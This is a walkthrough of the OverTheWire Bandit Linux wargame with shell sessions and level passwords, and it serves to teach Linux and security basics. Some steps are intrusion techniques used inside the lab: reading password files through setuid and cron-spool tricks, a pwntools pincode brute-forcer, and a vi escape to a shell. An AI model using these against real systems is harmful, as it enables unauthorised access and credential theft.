Wargames: Bandit walkthrough notes

Bandit is a site for practising Linux commands; these are notes from a casual play-through.

Level 0

  • Log in directly over ssh, specifying the port and the user name
ssh bandit0@bandit.labs.overthewire.org -p 2220
Password: bandit0

Level 0 → Level 1

  • Read readme to get the login password for the next level
bandit0@bandit:~$ cat readme
boJ9jbbUNNfktd78OOpsqOltutMc3MY1

Level 1 → Level 2

  • Log in over ssh with the password from the previous level, then read the file named -
ssh bandit1@bandit.labs.overthewire.org -p 2220
Password: boJ9jbbUNNfktd78OOpsqOltutMc3MY1

bandit1@bandit:~$ ls
-
bandit1@bandit:~$ cat ./-
CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9

Level 2 → Level 3

  • Log in over ssh with the password from the previous level, then read the file named "spaces in this filename"
ssh bandit2@bandit.labs.overthewire.org -p 2220
Password: CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9

bandit2@bandit:~$ ls
spaces in this filename
bandit2@bandit:~$ cat ./spaces\ in\ this\ filename
UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK

Level 3 → Level 4

  • The inhere directory contains a hidden file; ls -a shows it
bandit3@bandit:~$ ls
inhere
bandit3@bandit:~$ cd inhere/
bandit3@bandit:~/inhere$ ls
bandit3@bandit:~/inhere$ ls -a
. .. .hidden
bandit3@bandit:~/inhere$ cat .hidden
pIwrPrtPN36QITSp3EQaw936yaFoFgAB

Level 4 → Level 5

  • The inhere directory contains ten files; first determine which of them is readable text
bandit4@bandit:~$ ls
inhere
bandit4@bandit:~$ cd inhere/
bandit4@bandit:~/inhere$ ls
-file00 -file02 -file04 -file06 -file08
-file01 -file03 -file05 -file07 -file09
bandit4@bandit:~/inhere$ file ./*
./-file00: data
./-file01: data
./-file02: Non-ISO extended-ASCII text
./-file03: data
./-file04: data
./-file05: data
./-file06: data
./-file07: ASCII text
./-file08: data
./-file09: data
bandit4@bandit:~/inhere$ cat ./-file07
koReBOKuIDDepwhWk7jZC0RTdopnAYKh

Level 5 → Level 6

  • There are 20 directories; we need to find the readable file whose size is 1033 bytes, which the du command can do
bandit5@bandit:~$ ls
inhere
bandit5@bandit:~$ cd inhere/
bandit5@bandit:~/inhere$ ls
maybehere00 maybehere04 maybehere08 maybehere12 maybehere16
maybehere01 maybehere05 maybehere09 maybehere13 maybehere17
maybehere02 maybehere06 maybehere10 maybehere14 maybehere18
maybehere03 maybehere07 maybehere11 maybehere15 maybehere19
bandit5@bandit:~/inhere$ du ./* -a -b | grep 1033
1033 ./maybehere07/.file2
bandit5@bandit:~/inhere$ cat ./maybehere07/.file2
DXjZPULLxYr17uwoI01bNLQbtFemEgo7

Level 6 → Level 7

  • Search the server for a file owned by user bandit7 and group bandit6 with a size of 33 bytes, using find; 2>/dev/null redirects the error messages to the "black hole"
bandit6@bandit:~$ ls
bandit6@bandit:~$ find / -user bandit7 -group bandit6 -size 33c 2>/dev/null
/var/lib/dpkg/info/bandit7.password
bandit6@bandit:~$ cat /var/lib/dpkg/info/bandit7.password
HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs

Level 7 → Level 8

  • The password follows the word millionth in data.txt
bandit7@bandit:~$ ls
data.txt
bandit7@bandit:~$ cat data.txt | grep 'millionth'
millionth cvX2JJa4CFALtqS87jk27qwqGhBM9plV

Level 8 → Level 9

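  • Find the only line in data.txt that occurs exactly once: sort orders the file and uniq -u prints only the lines that are not repeated (uniq compares adjacent lines only, which is why sort comes first)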
bandit8@bandit:~$ sort data.txt | uniq -u
UsvVyFSfZZWbi6wgC7dAFyFuR6jQQUhR

Level 9 → Level 10

  • Just find the strings that begin with '='
bandit9@bandit:~$ ls
data.txt
bandit9@bandit:~$ strings data.txt | grep '=='
========== the
========== password
========== is
,Y========== truKLdjsbJ5g7yyJ2X2R0o3a5HQJFuLk

Level 10 → Level 11

  • A base64 string; decode it directly with base64 -d
bandit10@bandit:~$ ls
data.txt
bandit10@bandit:~$ base64 -d data.txt
The password is IFukwKGsFW8MOq3IRFqrxE1hxTNEbUPR

Level 11 → Level 12

  • The content of data.txt has been substituted: every letter is shifted 13 positions forward (ROT13), so tr is used to map it back
bandit11@bandit:~$ ls
data.txt
bandit11@bandit:~$ cat data.txt
Gur cnffjbeq vf 5Gr8L4qetPEsPk8htqjhRK8XSP6x2RHh
bandit11@bandit:~$ cat data.txt | tr 'a-zA-Z' 'n-za-mN-ZA-M'
The password is 5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu

Level 12 → Level 13

  • A hex dump file is given; first copy it into your own directory under /tmp, convert it back to a binary file with xxd, then decompress the gzip, bzip2 and tar layers in turn
bandit12@bandit:~$ ls
data.txt
bandit12@bandit:~$ mkdir /tmp/qwe123
bandit12@bandit:~$ cp data.txt /tmp/qwe123
bandit12@bandit:~$ cd /tmp/qwe123
bandit12@bandit:/tmp/qwe123$ ls
data.txt
bandit12@bandit:/tmp/qwe123$ cat data.txt
00000000: 1f8b 0808 d6e4 b85b 0203 6461 7461 322e .......[..data2.
...
00000260: 39cf be46 0200 00 9..F...
bandit12@bandit:/tmp/qwe123$ xxd -r data.txt data
bandit12@bandit:/tmp/qwe123$ file data
data: gzip compressed data, was "data2.bin", last modified: Sat Oct 6 16:37:42 2018, max compression, from Unix
bandit12@bandit:/tmp/qwe123$ mv data data.gz
bandit12@bandit:/tmp/qwe123$ gzip -d data.gz
bandit12@bandit:/tmp/qwe123$ ls
data data.txt
bandit12@bandit:/tmp/qwe123$ file data
data: bzip2 compressed data, block size = 900k
bandit12@bandit:/tmp/qwe123$ mv data data.bz2
bandit12@bandit:/tmp/qwe123$ bzip2 -d data.bz2
bandit12@bandit:/tmp/qwe123$ ls
data data.txt
bandit12@bandit:/tmp/qwe123$ file data
data: gzip compressed data, was "data4.bin", last modified: Sat Oct 6 16:37:42 2018, max compression, from Unix
bandit12@bandit:/tmp/qwe123$ mv data data.gz
bandit12@bandit:/tmp/qwe123$ gzip -d data.gz
bandit12@bandit:/tmp/qwe123$ file data
data: POSIX tar archive (GNU)
bandit12@bandit:/tmp/qwe123$ tar -xvf data
data5.bin
bandit12@bandit:/tmp/qwe123$ file data5.bin
data5.bin: POSIX tar archive (GNU)
bandit12@bandit:/tmp/qwe123$ tar -xvf data5.bin
data6.bin
bandit12@bandit:/tmp/qwe123$ tar -xvf data6.bin
data8.bin
bandit12@bandit:/tmp/qwe123$ file data8.bin
data8.bin: gzip compressed data, was "data9.bin", last modified: Sat Oct 6 16:37:42 2018, max compression, from Unix
bandit12@bandit:/tmp/qwe123$ mv data8.bin data.gz
bandit12@bandit:/tmp/qwe123$ gzip -d data.gz
gzip: data already exists; do you wish to overwrite (y or n)? y
bandit12@bandit:/tmp/qwe123$ ls
data data5.bin data6.bin data.txt
bandit12@bandit:/tmp/qwe123$ cat data
The password is 8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL
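
The rename-and-decompress loop in the session above can be automated. The following is an added example, not part of the original write-up: the function names layer_type and peel are made up here, and it assumes each tar layer holds a single member, as in this level.

```shell
#!/bin/sh
# Added example: peel gzip/bzip2/tar layers off a file until plain data is left.
# Layers are recognised by magic bytes, so nothing has to be renamed to .gz/.bz2.

layer_type() {
    # gzip starts with 1f 8b, bzip2 with "BZh" (42 5a 68)
    magic=$(od -An -tx1 -N3 "$1" | tr -d ' \n')
    case "$magic" in
        1f8b*)  echo gzip; return 0 ;;
        425a68) echo bzip2; return 0 ;;
    esac
    # tar has no leading magic; "ustar" (75 73 74 61 72) sits at offset 257
    ustar=$(od -An -tx1 -j257 -N5 "$1" 2>/dev/null | tr -d ' \n')
    if [ "$ustar" = 7573746172 ]; then echo tar; else echo plain; fi
}

peel() {
    # $1 = file to unwrap, $2 = scratch directory; prints the path of the result
    cur=$1; work=$2; n=0
    while [ "$n" -lt 32 ]; do        # cap the depth so a crafted file cannot loop forever
        n=$((n + 1)); next="$work/layer$n"
        case "$(layer_type "$cur")" in
            gzip)  gzip -dc "$cur" > "$next" || return 1 ;;
            bzip2) bzip2 -dc "$cur" > "$next" || return 1 ;;
            tar)   # -O streams the member to stdout, so member paths are never
                   # created on disk; only the first member is followed
                   member=$(tar -tf "$cur" | head -n 1)
                   tar -xOf "$cur" "$member" > "$next" || return 1 ;;
            plain) echo "$cur"; return 0 ;;
        esac
        cur=$next
    done
    return 1
}

# Usage on the level's hex dump (xxd -r reverses the dump, as in the session above):
#   xxd -r data.txt /tmp/qwe123/data.bin && peel /tmp/qwe123/data.bin /tmp/qwe123
```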

Level 13 → Level 14

  • Use the private key file to log in as bandit14 and then read the password
bandit13@bandit:~$ ls
sshkey.private
bandit13@bandit:~$ ssh -i sshkey.private bandit14@localhost
bandit14@bandit:~$ cat /etc/bandit_pass/bandit14
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e

Level 14 → Level 15

  • Connect to local port 30000 with nc and send the current level's password
bandit14@bandit:~$ nc localhost 30000
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e
Correct!
BfMYroe26WYalil77FoDi9qh59eK5xNr

Level 15 → Level 16

bandit15@bandit:~$ openssl s_client -connect localhost:30001
CONNECTED(00000003)
depth=0 CN = localhost
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = localhost
verify return:1
---
...
Start Time: 1538922837
Timeout : 7200 (sec)
Verify return code: 18 (self signed certificate)
Extended master secret: yes
---
BfMYroe26WYalil77FoDi9qh59eK5xNr
Correct!
cluFn7wTiGryunymYOu4RcffSxQluehd

closed

Level 16 → Level 17

bandit16@bandit:~$ nmap localhost -p 31000-32000

Starting Nmap 7.40 ( https://nmap.org ) at 2018-10-07 16:49 CEST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00015s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
31046/tcp open unknown
31518/tcp open unknown
31691/tcp open unknown
31790/tcp open unknown
31960/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 0.07 seconds
bandit16@bandit:~$ openssl s_client -connect localhost:31790
CONNECTED(00000003)
...
Correct!
-----BEGIN RSA PRIVATE KEY-----
...
-----END RSA PRIVATE KEY-----

closed

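# Save the private key to a file in a directory under /tmp, then log in as bandit17 with it and read the password. The key file's permissions must be set to 700, otherwise the login fails (ssh rejects private keys that group or others can access)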
bandit16@bandit:/tmp/qwe$ chmod 700 1.private
bandit16@bandit:/tmp/qwe$ ssh -i 1.private bandit17@localhost
bandit17@bandit:~$ cat /etc/bandit_pass/bandit17
xLYVMN9WE5zQ5vHacb0sZEVqbrp7nBTn

Level 17 → Level 18

  • Use diff to compare the two files directly
bandit17@bandit:~$ diff passwords.new passwords.old
42c42
< kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd
---
> f7UGxW7wGeltEOOtypYI8ECR3UVR2Jw0

Level 18 → Level 19

  • The ssh session is disconnected as soon as it connects; appending the command to run to the ssh command line returns its output
☁  ~  ssh bandit18@bandit.labs.overthewire.org -p 2220 cat readme
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames

bandit18@bandit.labs.overthewire.org's password:
IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x

Level 19 → Level 20

  • The password has to be read as bandit20; this level is about setuid
bandit19@bandit:~$ ls -l
-rwsr-x--- 1 bandit20 bandit19 7500 Oct 7 18:43 bandit20-do
bandit19@bandit:~$ cat /etc/bandit_pass/bandit20
cat: /etc/bandit_pass/bandit20: Permission denied
bandit19@bandit:~$ ./bandit20-do
Run a command as another user.
Example: ./bandit20-do id
bandit19@bandit:~$ ./bandit20-do cat /etc/bandit_pass/bandit20
GbKksEFF4yrVs6il55v6gwY5aVje5f0j

Level 20 → Level 21

  • We need to listen on a port and feed the previous level's password into the connection; connecting to our port with suconnect then returns the password.
bandit20@bandit:~$ nc -l -p 9999 < /etc/bandit_pass/bandit20 &
[1] 32140
bandit20@bandit:~$ ./suconnect 9999
Read: GbKksEFF4yrVs6il55v6gwY5aVje5f0j
Password matches, sending next password
gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr
[1]+ Done nc -l -p 9999 < /etc/bandit_pass/bandit20

Level 21 → Level 22

  • Look at the cronjob_bandit22 scheduled task
bandit21@bandit:~$ ls -l /etc/cron.d/
-rw-r--r-- 1 root root 120 Oct 7 18:43 cronjob_bandit22
-rw-r--r-- 1 root root 122 Oct 7 18:43 cronjob_bandit23
-rw-r--r-- 1 root root 120 Oct 7 18:43 cronjob_bandit24
bandit21@bandit:~$ cat /etc/cron.d/cronjob_bandit22
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
bandit21@bandit:~$ cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
bandit21@bandit:~$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI

Level 22 → Level 23

  • Look at the cronjob_bandit23 scheduled task
bandit22@bandit:~$ cat /etc/cron.d/cronjob_bandit23
@reboot bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
bandit22@bandit:~$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash

myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)

echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"

cat /etc/bandit_pass/$myname > /tmp/$mytarget
bandit22@bandit:~$ echo I am user bandit23 | md5sum | cut -d ' ' -f 1
8ca319486bfbbc3663ea0fbe81326349
bandit22@bandit:~$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n

Level 23 → Level 24

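  • The cronjob_bandit24 task runs every file in /var/spool/bandit24 once a minute (each one is killed if it has not finished within 60 s) and then deletes it, so we can write a shell script that outputs the password and let the server execute it

  • In a shell script there must be no spaces on either side of the equals sign
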
bandit23@bandit:~$ cat /etc/cron.d/cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
if [ "$i" != "." -a "$i" != ".." ];
then
echo "Handling $i"
timeout -s 9 60 ./$i
rm -f ./$i
fi
done

bandit23@bandit:~$ cd /tmp/qwe123
bandit23@bandit:/tmp/qwe123$ chmod 777 /tmp/qwe123
bandit23@bandit:/tmp/qwe123$ vi 1.sh
bandit23@bandit:/tmp/qwe123$ cat 1.sh
#!/bin/bash
cat /etc/bandit_pass/bandit24 >> /tmp/qwe123/pass
bandit23@bandit:/tmp/qwe123$ chmod 777 1.sh
bandit23@bandit:/tmp/qwe123$ cp 1.sh /var/spool/bandit24/
bandit23@bandit:/tmp/qwe123$ cat pass
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
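
This level works because the job running as bandit24 executes whatever other accounts place in /var/spool/bandit24. The check an administrator would run against such a directory, as an added example that is not part of the original write-up (audit_exec_dir and the finding labels are names made up here):

```shell
#!/bin/sh
# Added example: audit a directory whose contents a scheduled job executes,
# the pattern used by cronjob_bandit24.sh (run and delete everything in a spool dir).
# Prints one finding per line and nothing when the directory passes.

audit_exec_dir() {
    # $1 = directory the job runs files from, $2 = account (name or uid) the job runs as
    dir=$1; owner=$2
    # Whoever can write to the directory can drop in a file that the job will run.
    find "$dir" -prune \( -perm -020 -o -perm -002 \) \
        -exec echo DIR_WRITABLE_BY_OTHERS {} \;
    find "$dir" -prune ! -user "$owner" ! -user 0 \
        -exec echo DIR_FOREIGN_OWNER {} \;
    # The files themselves: created by another account, or editable by others.
    find "$dir" -mindepth 1 -maxdepth 1 -type f ! -user "$owner" ! -user 0 \
        -exec echo FILE_FOREIGN_OWNER {} \;
    find "$dir" -mindepth 1 -maxdepth 1 -type f \( -perm -020 -o -perm -002 \) \
        -exec echo FILE_WRITABLE_BY_OTHERS {} \;
}

# Usage: audit_exec_dir /var/spool/bandit24 bandit24
```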

Level 24 → Level 25

  • A script is needed to brute-force the pincode
bandit24@bandit:/tmp/qwe123$ cat 1.py
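from pwn import *
context.log_level = 'debug'
p = remote('localhost', 30002)
p.recvuntil(b'space.\n')
# Each line sent is "<bandit24 password> <4-digit pincode>".
# Only the pincodes 8000-9999 are tried here.
for i in range(8, 10):
    for j in range(10):
        for k in range(10):
            for l in range(10):
                pincode = str(i) + str(j) + str(k) + str(l)
                p.sendline(b'UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ ' + pincode.encode())
                data = p.recvline()
                # Stop at the first reply that is not a "Wrong" message
                if b'Wrong' not in data:
                    print('pincode: ' + pincode)
                    print(p.recv().decode())
                    exit()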
bandit24@bandit:/tmp/qwe123$ python 1.py
...
[DEBUG] Received 0x55 bytes:
'Correct!\n'
'The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG\n'
'\n'
'Exiting.\n'
pincode: 9342
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG

Level 25 → Level 26

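  • Logging in over ssh with the private key does not work. The level description says something is wrong with the shell, and the passwd file shows that the shell is not /bin/sh: it automatically runs more and then exits. While more is paging, you can enter vi mode and use e to load a file and read the password. The terminal has to be shrunk for more to start paging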
bandit25@bandit:~$ cat /etc/passwd | grep bandit26
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
bandit25@bandit:~$ cat /usr/bin/showtext
#!/bin/sh

export TERM=linux

more ~/text.txt
exit 0
bandit25@bandit:~$ ssh -i bandit26.sshkey bandit26@localhost

  • 5czgV9L3Xx8JPOyRbXh6lQbmIOWvPT6Z

Level 26 → Level 27

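  • As in the previous level, use more and vi, but there is no permission to read the password directly; get a shell first, then use the program to read the password as in the earlier level
# In vi mode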
:set shell=/bin/sh
:sh

$ ls
bandit27-do text.txt
$ ./bandit27-do cat /etc/bandit_pass/bandit27
3ba3118a22e93127a4ed485be72ef5ea

Level 27 → Level 28

  • Download the files directly with git clone
bandit27@bandit:~$ cd /tmp/qwe123
bandit27@bandit:/tmp/qwe123$ ssh://bandit27-git@localhost/home/bandit27-git/repo
-bash: ssh://bandit27-git@localhost/home/bandit27-git/repo: No such file or directory
bandit27@bandit:/tmp/qwe123$ git clone ssh://bandit27-git@localhost/home/bandit27-git/repo
Cloning into 'repo'...
...
Receiving objects: 100% (3/3), done.
bandit27@bandit:/tmp/qwe123$ ls
1.py 1.sh pass repo
bandit27@bandit:/tmp/qwe123$ cd repo/
bandit27@bandit:/tmp/qwe123/repo$ ls
README
bandit27@bandit:/tmp/qwe123/repo$ cat README
The password to the next level is: 0ef186ac70e04ea33b4c1853d2526fa2

Level 28 → Level 29

  • After git clone the file contains no password; git log shows a commit comment about fixing an information leak, so git show on the earlier commits reveals the password
bandit28@bandit:/tmp/qwe123$ git clone ssh://bandit28-git@localhost/home/bandit28-git/repo
Cloning into 'repo'...
...
Resolving deltas: 100% (2/2), done.
bandit28@bandit:/tmp/qwe123$ ls
1.py 1.sh pass rep1 repo
bandit28@bandit:/tmp/qwe123$ cd repo
bandit28@bandit:/tmp/qwe123/repo$ ls
README.md
bandit28@bandit:/tmp/qwe123/repo$ cat README.md
# Bandit Notes
Some notes for level29 of bandit.

## credentials

- username: bandit29
- password: xxxxxxxxxx

  • bbc96594b4e001778eee9975372716b2

Level 29 → Level 30

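  • As before, download the files; git log and git show reveal nothing. Listing the branches shows a dev branch, probably the developers'; after switching to it there is a commit with the comment "add data needed for development", and git show on it reveals the password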
bandit29@bandit:/tmp/qwe123$ git clone ssh://bandit29-git@localhost/home/bandit29-git/repo
Cloning into 'repo'...
...
Resolving deltas: 100% (2/2), done.
bandit29@bandit:/tmp/qwe123$ cd repo
bandit29@bandit:/tmp/qwe123/repo$ ls
README.md
bandit29@bandit:/tmp/qwe123/repo$ cat README.md
# Bandit Notes
Some notes for bandit30 of bandit.

## credentials

- username: bandit30
- password: <no passwords in production!>

  • 5b90576bedb2cc04c86a9e924ce42faf

Level 30 → Level 31

  • git show-ref lists the refs clearly; it reveals one named secret, and showing it gives the password
bandit30@bandit:/tmp/qwe123$ git clone ssh://bandit30-git@localhost/home/bandit30-git/repo
bandit30@bandit:/tmp/qwe123/repo$ git show-ref
ba0247c6246270e4dce77e87901daef35bb74861 refs/heads/master
ba0247c6246270e4dce77e87901daef35bb74861 refs/remotes/origin/HEAD
ba0247c6246270e4dce77e87901daef35bb74861 refs/remotes/origin/master
f17132340e8ee6c159e0a4a6bc6f80e1da3b1aea refs/tags/secret
bandit30@bandit:/tmp/qwe123/repo$ git show f17132340e8ee6c159e0a4a6bc6f80e1da3b1aea
47e603bb428404d265f59c42920d81e5
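
Levels 28 to 30 recover a credential from an old commit, a second branch and a tag. The same search from the repository owner's side, as an added example that is not part of the original write-up: scan_repo_blobs and locate_blob are names made up here, and the pattern is whatever secret format you are looking for.

```shell
#!/bin/sh
# Added example: look for a secret in every object a repository stores, not only
# in the files checked out at HEAD.

scan_repo_blobs() {
    # $1 = repository path, $2 = extended regex; prints the id of each matching blob
    repo=$1; pattern=$2
    git -C "$repo" cat-file --batch-all-objects --batch-check |
    while read -r sha type size; do
        [ "$type" = blob ] || continue
        if git -C "$repo" cat-file -p "$sha" | grep -Eq -e "$pattern"; then
            echo "$sha"
        fi
    done
}

locate_blob() {
    # $1 = repository path, $2 = blob id; prints where the blob is reachable from
    repo=$1; blob=$2
    # refs that point straight at the blob (a tag can name a blob directly,
    # which is what the Level 30 output suggests)
    git -C "$repo" for-each-ref --format='%(objectname) ref %(refname)' |
        sed -n "/^$blob /p"
    # commits on any branch or tag whose diff adds or removes the blob
    git -C "$repo" log --all --find-object="$blob" --format='commit %H'
}

# Usage: scan_repo_blobs ./repo 'password: [0-9a-f]{32}'
```

A blob reported by scan_repo_blobs but absent from the checked-out files is a secret that was edited out of HEAD and is still served to anyone who can clone.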

Level 31 → Level 32

  • Push a key.txt to the remote and the password is returned
bandit31@bandit:/tmp/qwe123$ git clone ssh://bandit31-git@localhost/home/bandit31-git/repo
bandit31@bandit:/tmp/qwe123$ cd repo
bandit31@bandit:/tmp/qwe123/repo$ ls
README.md
bandit31@bandit:/tmp/qwe123/repo$ cat README.md
This time your task is to push a file to the remote repository.

Details:
File name: key.txt
Content: 'May I come in?'
Branch: master
bandit31@bandit:/tmp/qwe123/repo$ echo May I come in? >> key.txt
bandit31@bandit:/tmp/qwe123/repo$ git add -f key.txt
bandit31@bandit:/tmp/qwe123/repo$ git commit
bandit31@bandit:/tmp/qwe123/repo$ git push

  • 56a9bf19c63d650ce78e6ec0354ee45e

Level 32 → Level 33

  • Prepare in advance a shell script named TEST in upper case, then use the shell's ? wildcard matching to execute the /tmp/123/TEST script, and then read the password
bandit31@bandit:~$ cd /
bandit31@bandit:/$ mkdir /tmp/123
bandit31@bandit:/$ cd /tmp/123
bandit31@bandit:/tmp/123$ ls
bandit31@bandit:/tmp/123$ vi TEST
bandit31@bandit:/tmp/123$ chmod 777 TEST
bandit31@bandit:/tmp/123$ cat TEST
#!/bin/bash
bash

  • c9c3199ddf4121b10cf581a98d51caee

Level 33 → Level 34

  • At this moment, level 34 does not exist yet.